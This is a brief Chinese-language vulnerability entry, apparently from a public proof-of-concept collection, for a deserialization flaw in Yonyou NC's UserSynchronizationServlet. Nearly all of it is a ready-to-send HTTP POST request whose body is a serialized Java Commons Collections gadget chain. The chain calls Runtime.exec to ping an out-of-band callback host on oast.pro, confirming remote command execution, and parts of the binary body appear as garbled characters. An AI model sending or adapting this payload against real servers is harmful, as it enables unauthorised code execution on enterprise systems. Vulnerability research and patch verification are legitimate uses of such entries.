漏洞描述
用友 NC UserSynchronizationServlet 反序列化
用友 NC UserSynchronizationServlet 反序列化漏洞
PoC代码[已公开]
POST /servlet/UserSynchronizationServlet?pageId=login HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 1355
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
X-Originating-Ip: [REDACTED]
X-Remote-Addr: [REDACTED]
X-Remote-Ip: [REDACTED]
���sr�java.util.HashSet�D�����4��xpw
���?@�����sr�4org.apache.commons.collections.keyvalue.TiedMapEntry��қ9� ��L�keyt�Ljava/lang/Object;L�mapt�Ljava/util/Map;xpt�&https://github.com/joaomatosf/jexboss sr�*org.apache.commons.collections.map.LazyMapn唂�y��L�factoryt�,Lorg/apache/commons/collections/Transformer;xpsr�:org.apache.commons.collections.functors.ChainedTransformer0Ǘ�(z��[�
iTransformerst�-[Lorg/apache/commons/collections/Transformer;xpur�-[Lorg.apache.commons.collections.Transformer;�V*��4���xp���sr�;org.apache.commons.collections.functors.ConstantTransformerXv�A���L� iConstantq�~�xpvr�java.lang.Runtime�����������xpsr�:org.apache.commons.collections.functors.InvokerTransformer���k{|�8�[�iArgst�[Ljava/lang/Object;L�
iMethodNamet�Ljava/lang/String;[�
iParamTypest�[Ljava/lang/Class;xpur�[Ljava.lang.Object;��X�s)l��xp���t�
getRuntimeur�[Ljava.lang.Class;���Z���xp����t� getMethoduq�~����vr�java.lang.String���8z;�B��xpvq�~�sq�~�uq�~����puq�~�����t�invokeuq�~����vr�java.lang.Object�����������xpvq�~�sq�~�ur�[Ljava.lang.String;��V��
{G��xp���t�/ping d3i6c3plt95kfs63s15gp7ihb7adw9xu1.oast.prot�execuq�~����q�~� sq�~�sr�java.lang.Integer⠤���8�I�valuexr�java.lang.Number���
�����xp���sr�java.util.HashMap���`��F�
loadFactorI� thresholdxp?@������w�������xxx